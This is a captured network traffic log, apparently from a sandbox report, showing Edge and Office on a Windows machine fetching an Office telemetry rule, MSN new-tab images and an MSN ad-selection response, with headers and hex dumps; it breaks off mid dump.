2024-11-11 09:33:24 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:24 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:24 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: 95c6b661-501e-0078-17d5-3306cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093324Z-174f7845968vwdr7hC1EWRsh3w00000004qg000000003yhh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 09:33:24 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49824	23.44.133.12	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:24 UTC	634	OUT	GET /tenant/amp/entityid/BB1msKSj.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:24 UTC	521	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msKSj Last-Modified: Sat, 09 Nov 2024 01:22:53 GMT X-Source-Length: 101189 X-Datacenter: eastus X-ActivityId: 5b57a263-e6db-4ae5-a285-a421698df971 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 101189 Cache-Control: public, max-age=229743 Expires: Thu, 14 Nov 2024 01:22:27 GMT Date: Mon, 11 Nov 2024 09:33:24 GMT Connection: close
2024-11-11 09:33:24 UTC	15863	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-11 09:33:24 UTC	16384	IN	Data Raw: 04 21 64 c2 12 2c 9a 42 14 18 08 8e 3f 59 f8 21 4c d8 21 42 8b 5c 9a 17 5a c9 02 fd ee 1f 2f 24 10 98 44 2a 8b 4f d8 f9 24 0b 55 09 b1 23 cb 74 28 05 2b 52 0e 27 30 c3 81 61 89 87 72 98 3b 58 c1 33 c2 12 88 83 63 3d 52 32 e1 17 4f 98 ee b9 5c 24 6b 73 8b a2 48 e5 10 20 0d 87 0b 47 89 dd 00 f1 56 b9 01 47 86 c3 cb f1 ea 88 2e b9 95 68 21 23 16 42 11 aa 35 42 28 13 c6 27 6d 89 f1 83 0a e1 5c 14 29 6e 71 71 26 c2 7a 0f a5 ad 08 61 12 b4 1a cc 52 db 99 bc 83 00 0f 2e 26 c8 29 24 12 01 81 72 6f 03 a9 4c 84 45 e6 8a 2d 48 25 db 09 24 da e6 24 f4 e0 10 10 ca e4 cb 09 91 3e 3b 75 40 90 02 37 36 36 24 8b 5e 22 fc 57 2e dd 09 07 db fb 2e 44 55 04 d0 14 7d 49 f1 56 09 12 06 c7 7d 94 9c 65 c0 3c b6 a9 a4 dd b1 66 8d c9 30 4c 79 47 9a 12 8c 2c 8a a3 33 13 3c 3c fc 95 Data Ascii: !d,B?Y!L!B\Z/$D*O$U#t(+R'0ar;X3c=R2O\$ksH GVG.h!#B5B('m\)nqq&zaR.&)$roLE-H%$$>;u@766$^"W..DU}IV}e<f0LyG,3<<
2024-11-11 09:33:24 UTC	1766	IN	Data Raw: f3 b9 c2 e3 8d 99 07 6b 93 75 8f a4 0f f6 73 ea 76 72 6b 73 6b 61 b5 65 db 45 64 52 66 78 6c 17 ad 6f b5 03 72 1c 79 71 9e 6d a0 89 3d 81 0e 81 7e 84 9e 8a e7 7b 3d d9 d8 f2 ad c0 f7 81 10 4f e5 30 d7 79 80 4c 1f 03 2a 33 9a 41 82 08 23 81 10 67 a8 5e cd d9 f4 e3 2b 9a 58 d0 d2 3f c4 60 12 09 bd 2e 0d b8 89 ef 3b c2 8f 93 48 d7 bb 0b 35 2f e6 c8 03 ab 69 a0 db f8 9a b9 9c 20 f1 20 ae 9e bf 6f ca 5e 4e 15 47 55 bd ab f6 6b f0 f3 b1 e1 cc 89 2f 34 c3 7c c0 33 4f 56 c9 e8 b1 ce 37 34 07 11 62 26 45 da 7c 8f 6f 38 5d 33 bc ed ee 94 78 5c 9b 10 85 6b a9 2d 72 35 c9 80 2e 44 b9 04 15 c8 d0 20 9c b9 5a b8 41 81 52 38 54 82 52 e4 48 54 85 2a 44 b9 00 2a ab f4 cb 5d 21 a4 11 04 8a 80 bf e5 e3 e4 8b 82 8f 91 e1 94 b4 b4 bc b8 d9 80 5d d7 f2 58 7d 97 25 5f 59 b5 2f Data Ascii: kusvrkskaeEdRfxloryqm=~{=O0yL3A#g^+X?`.;H5/i o^NGUk/4\|3OV74b&E\|o8]3x\k-r5.D ZAR8TRHTD*]!]X}%_Y/
2024-11-11 09:33:24 UTC	16384	IN	Data Raw: 94 92 bb a0 71 29 64 aa 25 2c 95 44 a2 52 09 46 4a 49 54 02 50 15 68 13 20 94 08 d1 e3 0d 2f 0d 79 80 7b 10 3e 64 cd 91 b8 8a 8c 85 7a 57 fb 3f 18 63 8d 4f 04 77 2d 2d 98 90 2d dd 62 37 11 c8 25 85 ae b9 05 b5 0a 81 1c 38 78 46 e9 4e f2 a3 65 43 5c 98 e6 d0 48 75 88 dc 29 38 f4 ce c8 dc 8f 90 c6 e3 61 7b 89 dc b4 02 6c 38 cc 40 3b 4f 15 57 b4 80 ac 78 1f 95 c0 31 a4 cc c5 8c 58 49 5e a7 4b ec c1 27 d4 3c df a6 f0 5b bb 3f 33 4d a0 de d6 1c 37 0b 37 41 af 71 2d 6e 3c 38 d9 8a c0 3d c4 4b c9 68 98 2e 73 65 f7 2e 75 2d 23 82 d1 66 a9 ae d5 ea 18 5e 5f 1e eb 9a 63 94 34 90 d7 53 62 d8 75 af 32 2e b9 3b 7d 96 fa 78 67 75 a7 9b 4e 32 66 6e 53 93 3e 3c 83 94 37 11 80 f2 0c c9 64 89 8f eb 30 38 84 dc fa b7 60 7e 26 7a 39 32 35 fe f6 4e 0c 6d cb 8b 84 76 13 c0 1e Data Ascii: q)d%,DRFJITPh /y{>dzW?cOw---b7%8xFNeC\Hu)8a{l8@;OWx1XI^K'<[?3M77Aq-n<8=Kh.se.u-#f^_c4Sbu2.;}xguN2fnS><7d08`~&z925Nmv
2024-11-11 09:33:24 UTC	16384	IN	Data Raw: 7a 88 f1 d9 6d 33 09 38 2a 78 2c c6 1b 00 b8 dc f7 75 3b 92 78 0e 3b a1 36 a1 e9 f0 b3 44 c7 1c cf 63 4b da 4c 93 bb 4f 00 d1 2e 24 cf 05 13 06 0c 39 28 82 44 19 83 b3 e0 f1 69 98 81 c1 64 eb 33 bb 23 e1 ae 71 68 f7 41 ec 38 ba 38 f4 d8 6c a0 e2 c8 f6 3a 1a 4d ed bf c9 2d 69 23 68 61 c6 e2 fc 8e 88 0e 86 b1 a2 03 c9 36 f0 e3 68 41 e8 b7 d5 61 61 0d 22 48 02 26 5b 7d b6 83 e6 ad fa 6c f0 c6 be 96 45 e4 9d e4 ef 69 b8 16 e8 b4 74 fa 13 8c 8c 99 8d 34 98 6c 11 7f ea b0 f7 7c f7 4d 44 1c 4c 27 d5 2e 7b 5a 60 98 7e ee 32 4c 4c 98 1b 79 a7 e9 b5 25 f5 e0 e6 87 fb a2 77 03 60 4f 08 81 e0 a3 30 3f 50 ec 8c 66 40 cd cf 35 aa 1e 13 1d 63 75 d8 c1 39 bd 36 38 12 d9 e7 82 2e dd c8 9b db aa 7a 1a a7 2f a1 9f 1b 4b 83 5e 5a 0b f8 b4 3a 48 b9 b7 91 db 75 a3 48 cd 9b 1b Data Ascii: zm38*x,u;x;6DcKLO.$9(Did3#qhA88l:M-i#ha6hAaa"H&[}lEit4l\|MDL'.{Z`~2LLy%w`O0?Pf@5cu968.z/K^Z:HuH
2024-11-11 09:33:24 UTC	7952	IN	Data Raw: 00 0f 9f 1d 75 41 cf f4 43 5b 4c 10 62 72 47 f1 9e c3 8e f1 e6 a2 69 06 4d 6e 53 97 27 b8 d1 16 90 db dc 32 4e cd 1c 6e 13 9b 89 ec e6 cd 0c da 8c 38 cc e4 0c 6e cd d8 c0 3c 4b 94 c8 cd 98 5c 33 13 41 24 62 60 2e 0d 6f 56 c7 3b 8f 19 20 2b 69 9f 08 ba cd 5c ff 00 86 5a 1a d1 1c a2 d2 36 03 87 8a c2 d3 35 fa cc f1 73 4c 3b 73 6b de 4d c9 2a 53 f0 fe f3 2d 0c 2e 0d 61 73 6f ca 49 07 7a 44 81 f3 2b 47 52 d6 68 1a 34 98 84 66 70 9c cf d9 cc 69 10 31 8e c5 df ca 0d 85 92 69 3a e4 23 59 94 bf 2c 36 32 06 99 bf bb 2d de 26 2d 3c 7a 2c 0c c7 76 8e f2 6d df ad ca 97 93 fc 38 2e 6b ed 4c 36 39 48 1b 0e c3 be ea 2b 31 89 00 6e 78 de dd e4 46 d3 b0 48 49 89 58 47 a5 4b aa aa 5d 34 83 b5 b6 b7 85 cf 82 f4 58 f2 5f 90 96 d4 d2 0d 8c 1b f6 ee 47 12 b1 08 c7 8a 8b 8b b8 Data Ascii: uAC[LbrGiMnS'2Nn8n<K\3A$b`.oV; +i\Z65sL;skM*S-.asoIzD+GRh4fpi1i:#Y,62-&-<z,vm8.kL69H+1nxFHIXGK]4X_G
2024-11-11 09:33:24 UTC	16384	IN	Data Raw: 3e 5f 5d c0 06 9c 78 3d 57 32 a1 30 05 64 0a 84 8e 67 54 83 4b a7 d4 33 23 9b 9b 55 9f 33 18 da de c3 8f 1e 3c 72 0c 0a 9c 4d 32 08 b3 4b a0 f7 5e a3 13 3f 6a c6 b7 4f a7 38 cb de 5d 92 72 34 52 49 21 c5 86 ee 73 c3 49 18 c9 00 36 50 bb 46 dd 50 c8 1f 8d c7 1c 1f 45 8e cd 96 9c 4e 80 d2 e7 b5 8e 35 10 00 20 98 b9 28 2f f6 bc f0 d0 e8 72 e5 71 ab 54 fa a0 e4 7e 36 62 75 46 f0 72 35 a4 98 df c7 82 76 26 e0 d3 e9 f3 06 33 51 8d ac 00 bc b8 e1 16 79 86 d4 e9 0d 6c fe 5f 78 5a 41 5a ef d3 e4 66 9d fa 6f 4b 07 a6 f0 da bf 48 b6 a2 d3 ca 5d 49 00 c6 d0 78 71 49 7e 84 e6 68 63 b3 ea 2d 31 e9 b3 18 37 b1 a9 c0 4b ac 20 17 5e e4 ca 91 78 b2 fd 4d 3b 03 46 41 a9 6d 4f 81 4e 4d 3b de e3 1b 52 c2 e7 13 7e de 29 f8 3d a5 a0 c3 53 5b fb be 20 b8 50 1c 41 e0 25 a2 91 e4 Data Ascii: >_]x=W20dgTK3#U3<rM2K^?jO8]r4RI!sI6PFPEN5 (/rqT~6buFr5v&3Qyl_xZAZfoKH]IxqI~hc-17K ^xM;FAmONM;R~)=S[ PA%
2024-11-11 09:33:24 UTC	10072	IN	Data Raw: 43 1b ff 00 17 16 fc ba 25 51 8e 39 86 3f 93 4f d6 9f 82 3f 47 23 43 89 a1 cc 64 12 e7 1f 4d 87 bf f9 4a 56 60 fc 0f 82 da 5c 5b 6a 5c 6e 44 58 de f6 da f2 50 69 30 de 11 11 b0 82 3e 83 fc 94 47 63 69 3f e2 c4 4d ac 0c 47 01 09 18 da 33 bc fa a4 ee 7d d9 2e e8 04 fe 0b 45 9a 62 d3 b3 1e dd e5 c2 4e dc 69 36 83 13 d5 23 43 f4 1a 5c 2e e1 62 49 74 11 e5 01 0f a1 51 22 66 3b 12 05 fa 11 f6 2a 43 81 c4 ed 98 c2 77 87 54 2f c6 48 ff 00 34 d2 dc 8c 88 2c 79 37 02 96 c5 b7 07 7d c2 65 a8 9e 99 c5 12 ee 33 bf bc 7c e7 b7 9a 8b 5b 43 c3 4d 47 87 2c b6 fc 2e e1 1e 1c 56 cb bd 0c 8d 15 31 f2 6f 01 83 7f 31 c3 c5 44 71 80 d7 12 e0 01 82 c7 06 da 66 fd ee 90 d2 99 95 e4 c5 51 16 3f 08 fc 66 14 93 91 e1 c7 dd e1 b5 f7 d8 fd be 48 46 37 e5 30 20 8f 36 93 6e e7 75 61 94 Data Ascii: C%Q9?O?G#CdMJV`\[j\nDXPi0>Gci?MG3}.EbNi6#C\.bItQ"f;*CwT/H4,y7}e3\|[CMG,.V1o1DqfQ?fHF70 6nua

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	49823	20.1.248.118	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:24 UTC	999	OUT	GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=18874E57A98C67C518B55B63A89566FE&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=b999bbd0c2a6420dd959169b039fe5a6 HTTP/1.1 Host: arc.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=18874E57A98C67C518B55B63A89566FE; _EDGE_S=F=1&SID=143A1788354267EB0AE802BC343E6686; _EDGE_V=1
2024-11-11 09:33:24 UTC	777	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2821 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"1,P425281352-T700370825-C128000000003001789+B+P60+S1"},{"BATCH_REDIRECT_STORE":"B128000000003001789+P0+S0"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}] Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Allow-Credentials: true X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Mon, 11 Nov 2024 09:33:23 GMT Connection: close
2024-11-11 09:33:24 UTC	2821	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 48 6f 74 73 70 6f 74 73 5c 22 2c 5c 22 75 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 73 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 74 69 74 6c 65 5c 22 3a 5c 22 52 6f 78 62 6f 72 6f 75 67 68 20 53 74 61 74 65 20 50 61 72 6b 2c 20 43 6f 6c 6f 72 61 64 6f 5c 22 2c 5c 22 63 74 61 5c 22 3a 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 5c 2f 73 65 61 72 63 68 3f 71 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"MSNAnaheimNewsNTPImageHotspots\",\"u\":\"MSNAnaheimNewsNTPImages\"}],\"ad\":{\"title\":\"Roxborough State Park, Colorado\",\"cta\":\"https:\/\/www.bing.com\/search?q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49825	23.44.133.12	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:24 UTC	634	OUT	GET /tenant/amp/entityid/AA12sf7A.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:24 UTC	521	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA12sf7A Last-Modified: Sun, 20 Oct 2024 23:49:33 GMT X-Source-Length: 114962 X-Datacenter: eastus X-ActivityId: f9c97283-f306-495f-9b12-cae296533644 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 114962 Cache-Control: public, max-age=137763 Expires: Tue, 12 Nov 2024 23:49:27 GMT Date: Mon, 11 Nov 2024 09:33:24 GMT Connection: close
2024-11-11 09:33:24 UTC	15863	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-11 09:33:24 UTC	16384	IN	Data Raw: 85 da a2 66 d0 8a a6 2d 98 a6 2f 2d 29 89 be 4e 39 24 9e 3c ca c9 6c 03 84 93 dc b9 27 52 75 44 2e 13 33 10 2e 9d 07 af 45 54 38 c5 fd ca e3 2b a2 e5 30 72 b2 4e 32 06 5a 5d 46 06 20 9e a8 4b 44 d3 0b 39 00 9c 91 42 d3 cd 94 78 b4 e5 29 18 34 d8 bf 6e 2a 3c ee 90 16 0a 2e a6 49 37 12 50 5a f0 e3 74 81 04 cd a6 ca 63 78 c9 f2 f4 aa c1 b8 6e 6f c1 04 64 99 c6 4c 77 fa 85 91 06 66 51 24 60 8c c5 af 19 81 9f 72 98 67 ec 48 18 55 cd a0 8b e8 79 1f 4a bb 3d a0 70 81 c6 75 31 fb ca 63 81 85 00 09 c9 5d 6b 0e 86 fe 2a 40 08 9b 22 66 4f 72 b0 01 1c e7 8a 08 04 6c 6d e7 dd e0 af b1 92 09 fa 41 f0 ee 40 b1 c2 d5 dc 61 a4 99 e5 de a6 ac 00 25 b2 1d 88 0c 18 6f 8a 22 79 8e 00 1b a6 01 4a b3 58 d9 91 7d 33 45 27 64 23 d1 cd 05 c4 d3 0b 63 3c a1 49 0d 73 b0 91 11 88 88 Data Ascii: f-/-)N9$<l'RuD.3.ET8+0rN2Z]F KD9Bx)4n<.I7PZtcxnodLwfQ$`rgHUyJ=pu1c]k@"fOrlmA@a%o"yJX}3E'd#c<Is
2024-11-11 09:33:24 UTC	1275	IN	Data Raw: ca b9 d5 e8 5a 7c d1 4d ed 0a 3b a6 09 1a eb a0 e4 93 89 78 90 60 f0 c5 88 0e 90 a5 56 6a 51 92 95 42 e6 90 73 d2 f9 4c cf ad d5 37 ba 41 92 48 cb 90 27 8f 44 e9 6b 10 72 89 95 a6 d5 0e 7e fc 37 3d 6d 1d 17 01 c6 09 37 ce 07 ee b3 9a 7a 3b 62 32 54 4b 9a ef 4d 86 1d ba 6c 75 13 9c 6b af 92 e6 31 c1 d2 0c 93 63 33 6b c4 dc e4 bc f9 87 4c c3 ae 26 ec ee b6 49 6c 88 06 77 b5 b7 13 75 83 50 82 44 18 eb 3e 07 db 79 58 44 5f e4 d3 0c 59 a2 2f 2e 36 c7 b2 d4 a1 5f 11 20 b0 b1 d7 16 f2 3e c2 57 4f b4 69 19 4c 67 98 10 23 28 0b d3 fa 8f a8 a7 7b 66 29 b4 c4 c4 c6 5d 9c de 76 1b 3c 9f a6 fa 6a b6 37 a6 ab c5 51 31 31 97 9e 8f 56 ed ba 8d 2a e0 87 b1 ae 74 49 91 7f 11 07 c5 5d 63 59 04 e4 64 4c 9e 47 5c 93 a3 77 73 6f 3a 2a 98 8e df db 46 13 76 7b 9b 5b 7b 99 57 44 Data Ascii: Z\|M;x`VjQBsL7AH'Dkr~7=m7z;b2TKMluk1c3kL&IlwuPD>yXD_Y/.6_ >WOiLg#({f)]v<j7Q11VtI]cYdLG\wso:Fv{[{WD
2024-11-11 09:33:24 UTC	16384	IN	Data Raw: 78 cb b7 35 dd 82 1c 23 29 c2 73 e4 42 f4 1f a3 01 9f f3 00 e8 9c 25 b7 81 d0 c6 57 57 b7 46 17 17 7d b9 cb c9 e7 c6 4f 6a 7e 9f 6b fa bc de 79 b5 6a 16 d2 70 73 41 76 36 43 80 c9 96 90 40 99 8b 66 ba 6f d9 a6 06 36 4c 9e cc 16 3b 78 ea 1b 06 c7 42 bd 5b 6b e9 e2 e3 a2 ba e7 37 8f 7b c4 3a f7 28 a2 9c a2 ea 58 2a 16 e2 c3 48 88 06 77 b5 31 26 f7 b8 5d 1a 75 b1 61 a2 f7 34 c0 c8 b6 1b 8b 16 2c a4 92 78 18 85 d9 cb 36 33 7b 65 ab 96 c7 95 f9 39 58 1a c6 b8 96 50 24 5f 0e 07 3a 47 59 85 dd ec e8 b6 71 35 87 98 2e 6e 9d 4f a1 6f e6 e5 c5 b9 da 9f 25 fe 2e 19 71 7d b1 06 e3 73 77 48 c3 70 2c 2f 7e e5 ba b5 a8 3a ab 9b 4d a4 01 68 2e b9 e7 70 7e 2b a6 c7 4c 4d b3 41 4c c2 6a 8c ec 89 6c 83 95 da 65 b9 09 47 ea 19 d8 ba 99 a4 d7 17 38 1c 52 0c 5a 22 e3 da 92 ed Data Ascii: x5#)sB%WWF}Oj~kyjpsAv6C@fo6L;xB[k7{:(X*Hw1&]ua4,x63{e9XP$_:GYq5.nOo%.q}swHp,/~:Mh.p~+LMALjleG8RZ"
2024-11-11 09:33:24 UTC	16384	IN	Data Raw: 50 56 79 c7 fc 76 3f 76 10 e9 04 5b ee 2b b3 ba e6 de 9a e2 78 c4 39 3b c6 35 53 31 cd c8 1b 38 12 5a 5e ec 24 8c 25 b8 26 38 19 32 17 66 a8 a7 8d 80 54 37 9b b4 36 d8 44 df 3c d7 36 0e dd 5d 73 69 98 ce 1d 18 9c b1 7b 4e 4f 1d 50 b8 61 73 88 68 78 c4 2f 98 98 f8 af 45 b4 ff 00 08 66 4f b3 a6 5a dc a3 96 57 e0 bc fc a2 6c ec ae 6d 6b 5b c1 db 69 73 d3 9d f5 84 bb 0b c8 a3 9f cc ef 8a e7 53 ac 69 1c 00 18 18 9c 72 32 0e 5c c4 67 2a 36 e2 f1 3d ac e9 dc 8a 66 5a 55 3a 76 7e e2 69 99 85 05 a5 ea 07 ce 82 42 60 02 4d 00 18 42 00 01 09 80 0d 08 00 04 d2 33 01 09 00 66 92 01 03 42 46 0c 21 23 20 10 91 98 34 92 00 1a 48 00 1a 48 06 4d 2c a4 66 46 92 01 91 a1 00 03 51 39 e1 b6 cc a4 53 36 36 b4 51 8b b0 aa 18 55 cd 4b c9 ee d6 fd 16 5b 93 68 ed 67 33 9e 6d 36 69 Data Ascii: PVyv?v[+x9;5S18Z^$%&82fT76D<6]si{NOPashx/EfOZWlmk[isSir2\g*6=fZU:v~iB`MB3fBF!# 4HHM,fFQ9S66QUK[hg3m6i
2024-11-11 09:33:24 UTC	7952	IN	Data Raw: 99 de f5 63 6b 11 56 b6 1c 50 da 8e 1c be eb 67 a6 4b 48 9c a3 b1 e7 ce f4 44 cc 5f 4f d9 cb 86 73 7a 34 6c cc d3 4c db 5b 4f 9b 86 03 9a 29 b4 8c 98 5a 6f ae 8b 4e 04 d4 63 65 db d1 7d 78 9d 38 2e dc 50 f3 27 7b f1 99 bb 1a 28 98 88 7a 94 ed 7e 51 0f 1f 56 db 70 ff 00 f2 b3 d8 ba 95 ff 00 1f 5e 9e d1 da 4b 63 10 70 92 6f e5 aa f5 ef 7a 7d 1e 5d 3f 57 44 d3 69 89 bd bd b8 bc 8b 5a b8 ed 87 a5 57 d2 d5 8f 14 4c 5a eb cf 2f c5 46 1b 3f cd 4e 71 5a 05 ee 32 ba ee 56 d8 aa 06 d2 30 e7 61 2c aa ec 22 cd 05 da 98 cb aa ed a6 a8 89 9c f8 3c 8a 37 a6 6a d3 2f 97 d9 cd bb 4d 53 46 9c 7f 67 a5 b9 4d 38 27 3c f3 8b 